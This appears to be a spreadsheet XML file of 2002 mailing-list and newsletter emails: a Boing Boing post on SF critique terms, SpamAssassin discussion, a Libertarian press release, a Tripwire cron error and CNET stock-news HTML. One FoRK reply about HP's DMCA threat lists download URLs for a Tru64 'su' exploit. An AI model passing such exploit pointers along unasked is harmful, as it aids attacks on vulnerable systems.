    <t xml:space="preserve">Subject: Turkey City Lexicon
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506002
 Date: Not supplied
 After the talk at UT Austin, I spent Saturday at the Turkey City science 
 fiction writers' workshop at Bruce Sterling's place. Turkey City is a venerable 
 science fiction workshop that has spawned many good writers and a lexicon of 
 science fiction critical terms that is the de facto standard for understanding 
 what works and what doesn't in a work of science fiction: 
     Squid on the Mantelpiece 
     Chekhov said that if there are dueling pistols over the mantelpiece in the 
     first act, they should be fired in the third. In other words, a plot 
     element should be deployed in a timely fashion and with proper dramatic 
     emphasis. However, in SF plotting the MacGuffins are often so overwhelming 
     that they cause conventional plot structures to collapse. It's hard to 
     properly dramatize, say, the domestic effects of Dad's bank overdraft when 
     a giant writhing kraken is levelling the city. This mismatch between the 
     conventional dramatic proprieties and SF's extreme, grotesque, or visionary 
     thematics is known as the "squid on the mantelpiece." 
     Card Tricks in the Dark 
     Elaborately contrived plot which arrives at (a) the punchline of a private 
     joke no reader will get or (b) the display of some bit of learned trivia 
     relevant only to the author. This stunt may be intensely ingenious, and 
     very gratifying to the author, but it serves no visible fictional purpose. 
     (Attr. Tim Powers) 
 I had the cold from hell all weekend and I'm jetlagged, but I wanted to get 
 some links up before I hit the sack. Until tomorrow! Link[1] Discuss[2]
 [1] http://www.sfwa.org/writing/turkeycity.html
 [2] http://www.quicktopic.com/boing/H/cgivZf3AAhKkk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] SpamAssassin v2.40 released (finally)!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --eJnRUKwClWJh1Khz
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Mon, Sep 02, 2002 at 06:53:24PM +0100, Justin Mason wrote:
 &gt;   - Razor v2 now supported fully
 &lt;grrr&gt;  Who changed my code?    Dns.pm and Reporter.pm WRT Razor
 have pointers to $Mail::SpamAssassin::DEBUG, whereas it should be
 $Mail::SpamAssassin::DEBUG-&gt;{enabled}...
 I'll be submitting a bug/patch for this shortly.
 --=20
 Randomly Generated Tagline:
 MA Driving #2: Everything is under construction.
 --eJnRUKwClWJh1Khz
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9c8AKAuOQUeWAs2MRAu/AAJ4iCzGVLRmj/FZmbrmWDiikvy6JWgCcCj9e
 DG1iPuFjRLA81ijHNGqnVf4=
 =HpKL
 -----END PGP SIGNATURE-----
 --eJnRUKwClWJh1Khz--
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 On Wednesday 28 August 2002 01:34 pm, Brian McNett wrote:
 &gt;
 &gt; Uh... the reason is simple. Habeas runs something called the
 &gt; "Habeas Infringers List", and if you use their trademark without
 &gt; their permission, you'll end up on it.  Then, when you send spam
 &gt; with the misappropriated header, users of SA (2.40 supports
 &gt; this) will tag your mail as spam, rather than let it through.
 &gt; This may be done independantly of your IP address, so be
 &gt; prepared to constantly change domain names, and move your
 &gt; servers as fast as you send spam.
 &gt;
 &gt; Also, that little haiku is a copyrighted work, so not only CAN
 &gt; Habeas sue, they MUST sue to protect their copyright. And since
 &gt; it's a trademark as well, that's a double-whammy. Habeas has
 &gt; some pretty high-powered legal people, who will gladly go to
 &gt; town on violators.
 &gt;
 &gt; The whole point here is to give them the legal leverage they
 &gt; need to put spammers out of business, and not only block mail
 &gt; from them, but allow through the things that really AREN'T spam.
 &gt;
 &gt; --B
 &gt;
 And if a spammer forges headers???
 - -- 
 - ------------------------------------------------------------------------
 Robin Lynn Frank---Director of Operations---Paradigm, Omega, LLC
 http://paradigm-omega.com              http://paradigm-omega.net
  2002.  All rights reserved.  No duplication/dissemination permitted.
 Use of PGP/GPG encrypted mail preferred. No HTML/attachments accepted.
 Fingerprint:  08E0 567C 63CC 5642 DB6D  D490 0F98 D7D3 77EA 3714
 Key Server:  http://paradigm-omega.com/keymaster.html
 - ------------------------------------------------------------------------
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9bTeHD5jX03fqNxQRArMEAJ4l1p6ToRVaG4j+Dy3R2tzfD9FNvgCfRhU3
 kZo/MbYBSLyI/m1vsN4ZYmM=
 =miJB
 -----END PGP SIGNATURE-----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</si>
  <si>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LP RELEASE: Outrageous military spending
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 ===============================
 NEWS FROM THE LIBERTARIAN PARTY
 2600 Virginia Avenue, NW, Suite 100
 Washington DC 20037
 World Wide Web: http://www.LP.org
 ===============================
 For release: July 25, 2002
 ===============================
 For additional information:
 George Getz, Press Secretary
 Phone: (202) 333-0008 Ext. 222
 E-Mail: pressreleases@hq.LP.org
 ===============================
 Thousands spent on strippers, golf memberships
 shows Pentagon spending is out of control, Libertarians say
 WASHINGTON, DC -- Quiz question: Which of the following items have been 
 charged to the taxpayers recently by military personnel wielding 
 government-issued credit cards?
 (a) $38,000 for lap dancing at strip clubs near military bases.
 (b) $3,400 for a Sumo wrestling suit and $9,800 for Halloween costumes.
 (c) $7,373 for closing costs on a home and $16,000 for a corporate golf 
 membership.
 (d) $4,600 for white beach sand and $19,000 worth of decorative "river 
 rock" at a military base in the Arabian desert.
 (e) all of the above.
 "Incredibly, the answer is 'all of the above,' said Steve Dasbach, 
 Libertarian Party executive director. "Thanks to the federal 
 government's policy of doling out credit cards with no questions asked, 
 the military has launched a raid on your wallet."
 The shocking revelations are contained in a General Accounting Office 
 audit released last week that uncovered $101 million in "seemingly 
 unneeded expenditures" made by the Air Force and Army in 2000 and 
 2001. The purchases were made possible by the federal government's lax 
 credit card policy: At least 1.4 million Defense Department employees 
 carry credit cards, and last year they used them to splurge on $6.1 
 billion in goods and services, the audit found.
 In one case, a group of 200 soldiers used their military IDs and 
 government-issued travel cards to get cash at adult-entertainment bars, 
 then spent the money there. The clubs charged a 10 percent fee to 
 supply the soldiers with cash -- then billed the full amount to their 
 travel cards as a restaurant charge, the GAO found.
 "Are these warriors really fighting terrorism while frolicking in a 
 strip club, or defending our country while wearing a Sumo wrestling 
 suit?" asked Dasbach. "Americans who support a bigger defense budget, 
 take note: The Pentagon frequently behaves like any other bloated, 
 reckless government agency. It promises your money will be spent on the 
 worthiest of causes, then squanders it on things you could never even 
 imagine."
 Other spending uncovered by the audit included $45,000 for luxury 
 cruises, $1,800 for executive pillows, and $24,000 for a sofa and 
 armchair at a military installation in the Middle East, Dasbach noted.
 Some military employees actually defended the purchases, the audit 
 noted, by saying that recreational items such as golf memberships can 
 be "a useful tool for building good relations with a host country" 
 such as Saudi Arabia or the United Arab Emirates. 
 Not surprisingly, Dasbach said, the audit found "little evidence of 
 documented disciplinary action" against those who misused the cards, 
 so taxpayers may end up paying the tab.
 "It's time to impose a little military discipline on these deadbeat 
 Defense Department workers, and force them to personally reimburse 
 taxpayers for every penny of improper spending," he said.
 "Then cut the Pentagon's massive $379 billion budget to help guard 
 against such wasteful spending in the future. Perhaps that's one way to 
 force the Pentagon to spend its resources defending the country, 
 instead of offending the taxpayer."
 -----BEGIN PGP SIGNATURE-----
 Version: 2.6.2
 iQCVAwUBPUA6FdCSe1KnQG7RAQGAKwP/Zpfw0Uq3BPLnXXmnlWQ2aFFb1FSaj+nJ
 QOMt9q4TBhiYJhIdgdd+uGxoubiPfvyIweSR1PjOdoFe8dYf2h/V4gNS9hSmkSgC
 76RZVuitNf2DbEsaY8TtcUDLDC51m/jgxiGcgPkcyJ+0Wn11RRbktkVEefSNTaBz
 M8ibVFiDPyI=
 =9fYc
 -----END PGP SIGNATURE-----
 -----------------------------------------------------------------------
 The Libertarian Party                                http://www.lp.org/
 2600 Virginia Ave. NW, Suite 100                    voice: 202-333-0008
 Washington DC 20037                                   fax: 202-333-0072
 -----------------------------------------------------------------------
 For subscription changes, please use the WWW form at: 
 http://www.lp.org/action/email.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: vkatalov@elcomsoft.com: Security warning draws DMCA threat
</t>
  </si>
  <si>
    <t xml:space="preserve">Jon O. wrote:
 &gt; Looks like HP is using the DMCA to prevent full disclosure of
 &gt; security vulnerablities. This is not a good precedent...
 &gt; [...]
 &gt; &gt; WASHINGTON--Hewlett Packard has found a new club to use to pound
 &gt; &gt; researchers who unearth flaws in the company's software: the Digital
 &gt; &gt; Millennium Copyright Act.
 &gt; &gt;
 &gt; &gt; Invoking both the controversial 1998 DMCA and computer crime laws, HP
 &gt; &gt; has threatened to sue a team of researchers who publicized a
 &gt; &gt; vulnerability in the company's Tru64 Unix operating system.
 &gt; &gt; [...]
 Well that exploit requires an executable stack so it won't happen on a
 properly admin-ed system.  But anyway grab it if you want from any of
 a million places, such as:
   http://www.securiteam.com/exploits/5YP0S2035O.html
   http://packetstormsecurity.nl/0101-exploits/tru-64.su.c
   http://spisa.act.uji.es/spi/progs/codigo/www.hack.co.za/exploits/os/dg-ux/alpha/5a/su.c
 Bye,
   Rob.
      .-.                                                               .-.
     /   \           .-.                                 .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'                     `-'         \   /
              `-'                                               `-'
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Anacron job 'cron.daily'
</t>
  </si>
  <si>
    <t xml:space="preserve">/etc/cron.daily/tripwire-check:
 ****    Error: Tripwire database for jalapeno not found.    ****
 **** Run /etc/tripwire/twinstall.sh and/or tripwire --init. ****
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: Al'Qaeda's fantasy ideology:  Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Gary,
 Oh I don't know if I'd go to the point of 'hate lit' -- Its an
 interesting, albiet a bit troubling theory.   Its not touchy-feely,
 nor liberal friendly, but I wouldn't necessary say hate lit.
 &gt;&gt;&gt;&gt;&gt;&gt; "b" == bitbitch  &lt;bitbitch@magnesium.net&gt; writes:
 GLM&gt;     b&gt; My only problem with this article ...
 GLM&gt; I know I'll get my share of flames for saying so, but my only problem
 GLM&gt; with this article is that it is some of the scariest subtext hate-lit
 GLM&gt; propaganda I've seen come out of the US since the March of Tears, and
 GLM&gt; twice scarier that it is not seen as such.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Battered stocks regain ground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</si>
  <si>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href="http://clickthru.online.com/Click?q=3f-4sAEIqMW45Ukpn8Hcoh57BymNzeR"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href="http://clickthru.online.com/Click?q=55-TAHaIKJ8Xqi8kriqm86ccJ_2d2ZR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiUkrRvFBzceCGFySNP8dR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIP67D3GxYE9IO3JewkhBpuR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=94-rOVNQaI7DcMlbBqJ5elUjfr5JQyR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxJluCjrqz2JQZv91zVMlR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTZPSgNfzbnY9y52GfwH4R" &gt;MRAE&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;27.87%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPai3zCH6GK74p01K7fy3rR" &gt;LEXG&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;5.15&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;27.16%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOsNdL8fTRnU3P83P5XlR" &gt;BNHNA&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;14.95&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;24.63%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwyCntBcLeE4rbg6amtI4R" &gt;AETH&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.48&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;22.97%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XWrk9CAcMssDLfzpHOCerR" &gt;GGUY&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.1&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;21.57%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4OHYp_crEL2t1VlTK8yiR" &gt;GDYS&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;6.951&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-32.78%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4iUtIaYRvwlGWUTnaNtPR" &gt;APHT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.07&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-26.67%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtzdNpUwFMWz8AtIQwjjnR" &gt;AUTN&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.3&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-26.52%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDCi6swAuWhKPAKa1CPIuR" &gt;MHCO&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.74&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-21.71%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWc-BjephAfLHDx1984BOsR" &gt;PMFG&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;9.5&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-21.22%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers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href="http://clickthru.online.com/Click?q=92-ubRVQTzTtqolHMIzeFOPq1FsnynR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwDGVqv-ILF5vLk7KCgFeR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BdhioQyZwmobF8XEDxwcyR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErnMSx69710-kl0aSxkZlR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqVGvpdecXGugH6NQYvU4R"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11,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href="http://clickthru.online.com/Click?q=fb-aWErQkgq8DfIcxXoFokcTbTDoVrR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8801.53 &amp;nbsp;&lt;font color=#cc0000&gt;-11.97&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwnpRSHODPffACEH5fCAiR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1374.43 &amp;nbsp;&lt;font color=#009933&gt;28.42&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=25-inepIbdXN8Llvx2ZTscR7jeQrFPR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;927.37 &amp;nbsp;&lt;font color=#009933&gt;6.90&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzD8m3Woym7JR1rqAFZcCnR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;995.16 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#009933&gt;29.87&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- VISION PROMO --&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;CNET News.com Vision Series&lt;/b&gt;&lt;br&gt;Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU8lztgSEJ8g-rrsLKFK0uR" &gt;Vision Series home&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- /VISION PROMO --&gt;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size=3&gt;&lt;b&gt;Battered stocks regain ground&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Led by a surge in chip titan Intel, beaten-down technology shares rose Thursday.
 &lt;p&gt;
 Despite a Merrill Lynch downgrade of Yahoo to "reduce/sell", the Internet portal rose after posting better-than-expected second-quarter results and also helped lift the sector. CNET's Tech index gained 29.87 points, or 3.11 percent, to close at 995.16. The tech-laden Nasdaq composite index tacked on 28.42 points, or 2.11 percent, to close at 1,374.43--after hitting a five-year low Wednesday.
 &lt;p&gt;
 Broader markets were mixed amid news wholesale prices rose slightly and drug firm Bristol-Myers Squibb is being probed by the Securities and Exchange Commission. The Dow Jones industrial average fell 12.0 points, or 0.14 percent, to close at 8,801.5. The S&amp;P 500 added 6.9 points, or 0.75 percent, to close at 927.37, after it too reached a five-year low Wednesday.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href="http://clickthru.online.com/Click?q=65-K82zIDPtMvF-RG6D70VOf0m8P9ZR" &gt;With rebates, HP angles for PC sales &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Hewlett-Packard is trying to beat the heat with summer deals on PCs.
 For retail buyers in the United States, the company is offering several new rebate or promotional programs, designed to stimulate demand for its PCs, going into the back-to-school shopping season. Some of the deals include a new $200 mail-in rebate on desktops, while others offer instant $50 rebates.&lt;br&gt;&lt;B&gt;HEWLETT-PACKARD CO 15.23 -0.13% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPBjBPYe1kShU6coezkBZXdR" &gt;Shareholders sue PayPal, eBay &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 The PayPal-eBay merger has hit an early snag: Two shareholder lawsuits have been filed against the companies seeking to block the deal.
 The lawsuits, each filed in Delaware Chancery Court earlier this week on behalf of PayPal shareholders, charge that the deal represents a breach of the companies' fiduciary duty to those shareholders and that the price eBay is paying for PayPal is unfair and inadequate, the companies said in separate regulatory filings on Thursday.&lt;br&gt;&lt;B&gt;EBAY INC 60.38 2.63% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KKOQMiCj0Xvsg9tyQFWveR" &gt;SAP cuts forecast, shows Q2 loss &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Europe's biggest software maker, SAP AG, shocked the market on Thursday by unexpectedly cutting its sales forecast and missing analysts' forecast for the second quarter.
 The company said it would post a net loss of 235 million euros ($232 million) and said it was taking a non-recurring accounting charge of 414 million euros to cover impairments of minority investments in the United States, including a 318 million euros charge from its 20 percent stake in Commerce One.&lt;br&gt;&lt;B&gt;SAP AKTIENGESELLSCHAFT ADS 19.70 -7.73%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href="http://clickthru.online.com/Click?q=a4-HGTsQ6paohXSOe2463LvvI2rgYyR"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href="http://clickthru.online.com/Click?q=b9-WWcsQ-BadhgfBp7h8FdMkmoOwzlR" &gt;Merrill Lynch downgrades Yahoo in report 7/11/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analysts Justin Baldauf and Tim Gernitis cut their intermediate-term rating on the Internet giant from "neutral" to "reduce/sell" and their long-term rating from "strong buy" to "neutral" after seeing Yahoo's second-quarter results. Although the results look solid at first, Baldauf and Gernitis say Yahoo's growth was driven entirely by new initiatives. They also argue the firm's improved outlook seems driven completely by the Overture deal extension. Eventually, these initiatives will result in much lower growth rates, the analysts say. They argue Yahoo's stock price isn't supported by the firm's fundamentals.&lt;br&gt;&lt;B&gt;YAHOO INC 12.92 5.99% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxwzzzEDkn3ufz1Jey2fP4R"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href="http://clickthru.online.com/Click?q=e4-ABYFQVkWaEHbv1jI81u0PT_Qv1yR" &gt;EMC lures HP exec to technology post &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 EMC has hired Mark Lewis away from Hewlett-Packard to become chief technology officer and vice president of new ventures, the high-end storage specialist said Thursday.
 Lewis had been head of Compaq Computer's high-end storage division, then became head of worldwide storage marketing after the company's $19 billion merger with HP. He replaces Jim Rothnie, who is retiring and becoming CTO emeritus.&lt;br&gt;&lt;B&gt;EMC CORP 8.15 4.49% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOWLWRlxGNSM_svdGheo-lR"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href="http://clickthru.online.com/Click?q=0e--eOTIiQzhArLSHv4r8dJx98lbK4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM80Cnlnq0iAv2Y9ZZvQKrR"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href="http://clickthru.online.com/Click?q=38-bLkmIRM2LJWcNkXnhJiSUxuD-DiR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDQ-uQ0UQdaB0S22bbKAZR"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href="http://clickthru.online.com/Click?q=62-4oBiIePgZqOKG4dG9TmIKJ15BRdR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsqtLro70x31g9NPmdZPuR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
